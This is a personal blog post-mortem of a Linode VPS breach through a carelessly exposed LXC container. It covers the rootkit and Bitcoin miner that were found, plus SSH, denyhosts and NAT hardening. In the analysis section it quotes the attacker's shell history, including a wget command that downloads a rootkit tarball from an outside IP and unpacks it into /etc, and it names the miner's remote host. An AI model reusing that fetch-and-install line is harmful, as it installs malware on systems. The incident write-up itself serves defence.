It was a beautiful morning, with a lovely view from my window.
I got out of bed, switched on my phone, and happened to notice an alert e-mail from Linode telling me my VPS had been exceeding my pre-set CPU usage alert threshold for several hours.
Which was really weird – with the recent CPU upgrades nothing taxes the server – so I popped into a terminal session and immediately spotted an unknown executable running as root and maxing out one of the cores:

```
./talk 31.220.1.50 80 30800
```
That mostly ruined my day.
In retrospect, killing that process outright was a mistake – I should have figured out exactly what it was doing first: used `lsof` to see which files it had open, checked which LXC container (if any) it was running inside, and attached a debugger to see if I could learn anything else.
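If there's ever a next time, a quick triage along these lines would preserve most of that context before the kill (the PID is made up for the example):

```
# Inspect a suspicious process before killing it (12345 is a made-up PID)
ls -l /proc/12345/exe /proc/12345/cwd   # where the binary lives and runs from
cat /proc/12345/cgroup                  # cgroup paths reveal the LXC container, if any
lsof -p 12345                           # open files and network sockets
```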
But I was in the middle of the countryside with nothing but my iPad and iPhone, the kids were fighting over something in the next room, and I hadn't even had breakfast yet, so I killed it, rooted around in the logs for hints (there was nothing unseemly in `denyhosts`, `auth.log`, etc.), and filed a ticket with Linode alerting them to the breach.
Then I fished around some more and decided to shut the site down.
After breakfast, and since all of my site content and Python source currently[^1] reside in Dropbox and their online change log showed nothing in the site itself had been tampered with, I decided to rebuild the whole thing on a new Linode – which took around an hour altogether, from building a new host image to setting up new blank containers with the right configurations[^2].
Timing
Honestly, the timing couldn't have been worse. I've been completely stressed out over the past few weeks with work and family stuff (taking work home, sleeping less than six hours a night and generally freaking out piecemeal, something that hadn't happened to me in years), and we'd come to the countryside for a family occasion.
Information overload is rampant, so much so that on Friday I decided to temporarily nuke my personal Twitter account (it's a bad idea to have a public outlet for your feelings sometimes) and disable all the other social/online/community idiocies except Flickr. For good measure, I locked myself out of Google+ and Facebook and removed[^3] or hid the apps from everything but my iPad, as well as muting pretty much every single mailing list I'm not required to be on.
Yeah, it's that bad. I was hoping I could relax and unwind a bit over the weekend, but ended up spending most of Saturday doing overdue e-mail[^4] and refactoring a key component for a project that's been lagging behind. This hack completely nuked my Sunday as well.
I considered just leaving the site down, but I actually need it as a reference, so that wasn’t really an option. For instance, I had recently written a quick HOWTO on setting up LXC inside Linode for the vagrant-lxc wiki, and I needed my notes on Vagrant and other stuff.
The Setup
The irritating thing about this hack is that I’m very security-conscious, and that my setup was far from normal:
- There were only three open ports: SSH, HTTP and HTTPS/SPDY. There was a firewall but, despite blocking pretty much everything, its main purpose was to NAT those ports to LXC containers running on an internal private network (see the sketch after this list).
- SSH was running with key-only auth (root disabled, obviously) and using `denyhosts` to log (and block) external access attempts.
- The three site components (Varnish/SPDY front-end, Python back-end and Dropbox content updater) each ran inside a separate LXC container, NATed to the outside via the host.
- I rebooted the node every week or so to apply security updates across the board (first the containers, then the host).
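For the record, the NAT bit boils down to a couple of `iptables` rules roughly like these (the container address is illustrative):

```
# Forward inbound HTTP to the front-end container (10.0.3.10 is an example address)
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 10.0.3.10:80
# Let the containers on the private network reach the outside world
iptables -t nat -A POSTROUTING -s 10.0.3.0/24 -o eth0 -j MASQUERADE
```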
So I was stumped as to how they had gotten in, particularly since I'd done the last `apt-get dist-upgrade` and reboot that very Thursday. The easy way out would be to blame Linode (`lish` and their dashboard don't have a spotless record, but it's a palatable trade-off considering their feature set and constant upgrades), but after digging further I figured out they got in via a fourth container – one I'd set up in a hurry a while back.
As far as I could tell, they never broke out of the container (probably never even tried), and everything else on the machine was safe. But doing a full “nuke and pave” was the only way to make absolutely sure.
Mind you, LXC containers are not a guarantee of security in and of themselves (at work we use them extensively with `grsec`-tweaked kernels), but in this case they seem to have done the trick well enough.
Deconstructing the hack
The development container that was attacked was a recent setup (as of last month, actually). It was a fresh base container that I was using for package builds and ARM `rootfs` images.
My cardinal sin was that it had SSH directly exposed to the outside (on another non-standard, very high port which I'd only used once) and password authentication enabled. It was set up in a bit of a hurry and, as it happens, a stock Ubuntu configuration has SSH root access enabled in `sshd_config`.
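The galling part is that the fix is all of two lines in `sshd_config`:

```
# /etc/ssh/sshd_config – what that container should have had from day one
PermitRootLogin no
PasswordAuthentication no
```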
None of my other, older containers (which were created months ago) had `root` access or password authentication enabled, but cloning any of them would have brought too much baggage along. So I went for a stock image[^5], and I apparently failed to update it to the latest OpenSSH in my haste to get it running.
Ironically, I soon realized I needed more CPU power and decided to use another machine entirely for what I was doing – but forgot to turn off the container.
And even though it had `denyhosts` installed, it was accessed by literally hundreds of different IP addresses over the course of the last few days. Eventually one of them got direct `root` access somehow (I still don't know how, since it doesn't show up in any of the logs I've had time to review).
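For future reference, DenyHosts can be made a lot more aggressive than the stock settings – something along these lines in `/etc/denyhosts.conf` (the threshold values are illustrative):

```
# /etc/denyhosts.conf – tighter thresholds (example values)
SECURE_LOG = /var/log/auth.log
HOSTS_DENY = /etc/hosts.deny
BLOCK_SERVICE = sshd
DENY_THRESHOLD_ROOT = 1      # one failed root attempt is enough to block
DENY_THRESHOLD_INVALID = 3   # three attempts against non-existent users
DENY_THRESHOLD_VALID = 5     # five failed attempts against valid users
```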
After rebooting the node and poking around a bit more, I found a rootkit inside that development container under `/etc/.kde`, containing a Bitcoin miner:
```
root@tao:/var/lib/lxc/development/rootfs/etc/.kde# ls -al
total 764
drwxr-xr-x  2 root root   4096 Jun  1 15:00 .
drwxr-xr-x 74 root root   4096 Jun  2 13:14 ..
-rwxr-xr-x  1 root root    129 Jun  2 08:39 1
-rwxr-xr-x  1 root root    970 Jan  4 19:09 ago
-rw-r--r--  1 root root     52 Jun  2 13:20 a.seen
-rwxr-xr-x  1 root root    309 Apr 30  2009 autorun
-rwxr-xr-x  1 root root   8922 Jan 24  2006 b
-rwxr-xr-x  1 root root  19557 May  9  2005 b2
-rwxr-xr-x  1 root root 266463 May  9  2005 bang.txt
-rwxr-xr-x  1 root root  16875 Nov 12  2004 bleah
-rwxr-xr-x  1 root root     43 Jun  1 14:39 cron
-rwxr-xr-x  1 root root 152108 Jun  1  2001 crond
-rwxr-xr-x  1 root root     10 Jun  1 14:39 dir
-rwxr-xr-x  1 root root   8687 Jan 24  2006 f
-rwxr-xr-x  1 root root  14679 Nov  3  2005 f4
-rwxr-xr-x  1 root root     81 Aug 16  2006 fwd
-rwxr-xr-x  1 root root  15988 Sep  7  2002 j
-rwxr-xr-x  1 root root  13850 May 29  2005 j2
-rwxr-xr-x  1 root root  22983 Jul 29  2004 mech.help
-rw-r--r--  1 root root   1064 Jun  2 08:39 mech.levels
-rw-------  1 root root      4 Jun  2 13:15 mech.pid
-rw-r--r--  1 root root    350 Jun  2 08:39 mech.session
-rwxr-xr-x  1 root root    573 May 29 07:35 mech.set
-rwxr-xr-x  1 root root     31 Oct 12  2010 run
-rwxr-xr-x  1 root root  15078 Feb 20  2005 s
-rwxr-xr-x  1 root root  16776 Nov 19  2009 sl
-rwxr-xr-x  1 root root     27 Apr 30  2009 start.sh
-rwxr-xr-x  1 root root  15195 Sep  2  2004 std
-rwxr-xr-x  1 root root  13399 Sep 25  2010 stealth
-rwxr-xr-x  1 root root   8790 Jan 24  2006 stream
-rwxr-xr-x  1 root root  15994 Sep 25  2010 talk
-rwxr-xr-x  1 root root   7091 Jan 24  2006 tty
-rwxr-xr-x  1 root root    163 Jun  1 14:39 update
-rwxr-xr-x  1 root root  14841 Jul 22  2005 v2
-rwxr-xr-x  1 root root  16625 Nov 15  2007 x
```
Of those, `bang.txt` turned out to be the most interesting, and was the bit I kept for future reference – it contains 15171 IP addresses, which I've yet to compare against what logs I have.
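When I do get around to it, it should amount to a simple intersection (assuming `bang.txt` holds one address per line):

```
# Cross-reference the rootkit's IP list with addresses seen in auth.log
grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' /var/log/auth.log | sort -u > seen.txt
sort -u bang.txt | comm -12 - seen.txt
```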
A lot more interesting was the `root` user's `.bash_history` file, which revealed a possible lead for the attackers:

```
w
apt-get install libc6-i386 -y
apt-get update
apt-get install libc6-i386 -y
cd /etc
wget http://174.121.248.131/.../a.tgz; tar zxvf a.tgz ; rm -rf a.tgz; exit
```
That IP address belongs to ThePlanet.com, and it’s likely to be another compromised host.
And, of course, I've compiled a list of recent addresses that were captured in `auth.log` around the time those files were created on my filesystem.
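Nothing fancy there – just matching the syslog timestamp prefix around the files' creation times (June 1st, going by the listing above):

```
# Addresses logged around the time the rootkit files appeared
grep '^Jun  1' /var/log/auth.log | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
```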
But I’m too tired to do anything further about it at this point.
On Linode
To their credit, Linode replied to my ticket promptly but were unable to provide me with any other information (for instance, whether there had been any more suspicious activity in terms of network traffic) and referred me to my own log files and their rebuild instructions. So no dice there.
They did, however, provide a bit of extra info: the IP address I spotted as an argument to `talk` belongs to a company called Esecurity, registered in Belize, which ties in with the Bitcoin mining angle.
Like all similar stories, one feels simultaneously grateful and annoyed at a number of things about the hack. Since directing my frustration at the attackers is rather pointless, allow me to count my blessings and utter a couple of random, tangentially related curses:
Praise
- To Panic, without whose Prompt I wouldn't have been able to do this sanely on an iPad: thanks, even though screen refreshes are still excruciatingly slow when using `tmux` and there is so much more you could do to improve the app.
- To Linode, for having a great management tool that let me slice and dice machines and disk images to my heart's content.
- To the LXC folk, for baking in `btrfs` support, making it extremely efficient to run multiple containers out of limited disk space (see the sketch after this list).
- To 1Password, which I use to generate and keep all my unique passwords, keys, certificates and what not. The built-in browser was also essential to access the Linode dashboard without hassles.
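For anyone curious, the copy-on-write cloning that makes this practical goes something like this (container names are examples, and the exact flags vary a little across LXC releases):

```
# Create a base container backed by btrfs, then clone it as a CoW snapshot
lxc-create -t ubuntu -n base -B btrfs
lxc-clone -s -o base -n development   # near-instant, near-zero extra disk
```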
Random Curses
- To whoever decided that the Logitech Ultrathin Keyboard Cover for iPad didn't need an `Esc` key: you are a god-forsaken idiot who's made my life miserable every time I need to use `vim` (which is every day). Fortunately I used original VT100 keyboards (US layouts) back in the day, and know all about `Ctrl+[` and sundry.
- Whoever labeled `ufw` as 'uncomplicated' without ever trying to set up NAT to an internal interface on it ought to revise that 'u' to mean 'useless'. I very nearly went back to my old "raw" `iptables` setup (what I ended up doing is sketched below).
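For reference, getting NAT working meant bypassing `ufw`'s front-end entirely and editing its raw rules files, roughly like this (addresses are illustrative):

```
# /etc/default/ufw – allow forwarded packets
DEFAULT_FORWARD_POLICY="ACCEPT"

# /etc/ufw/sysctl.conf – enable IP forwarding
net/ipv4/ip_forward=1

# /etc/ufw/before.rules – add a *nat section before the *filter one
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 10.0.3.10:80
-A POSTROUTING -s 10.0.3.0/24 -o eth0 -j MASQUERADE
COMMIT
```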
Epilogue
All things considered, something good came of this – I had been running Ubuntu 12.04 32-bit and postponing a switch to a 64-bit OS for a while, so this was as good a trigger as any – I'm now running the latest bleeding-edge 13.04, which includes a little more security for LXC. I'll also be rebuilding the whole thing again come 13.10, just in case.
Also, this time around I set up different disk images for the OS, the LXC containers (using `btrfs` to make it easier to snapshot containers – highly recommended, by the way) and the site data, thereby making it easier (I hope) to get rid of and/or roll back any compromised components if (when?) this ever happens again.
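With that in place, snapshotting a container before (or after) risky changes is a one-liner, assuming each container sits in its own `btrfs` subvolume:

```
# Read-only, copy-on-write snapshot of a container's filesystem
btrfs subvolume snapshot -r /var/lib/lxc/development /var/lib/lxc/development-20130602
```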
Because nothing is truly secure in this world, alas. It’s always about compromise.
[^1]: I'm going to move this to CloudPT as soon as the CLI binary is considered stable – I'm currently playing around with an internal build and it's working absolutely fine, but I don't want to change too much stuff at once.

[^2]: The hardest bit was figuring out how to reproduce a few of the original tweaks to my container setup on an updated version of LXC, but, as with all truly improved technology, I actually had to do less configuration this time around.

[^3]: Also, when Google switched on their new inbox last week, they managed to make every single personal e-mail I ever sent since 2009 pop up again in my IMAP Sent folder, which made it impossible to search for a number of common topics in my usual setup.

[^4]: I have to say that disabling Google+ Hangouts was particularly satisfying given the way their Chrome extension currently works (or, rather, doesn't – it's too shoddy to be truly user-friendly right now). Too bad that it's becoming almost as popular as Skype for one-on-one video chats.

[^5]: This time around I created a blank `base` container, secured it properly and, thanks to `btrfs`, cloned it with copy-on-write to all the others. Of course, if I ever need to set up a different base, I'll try not to rush things again.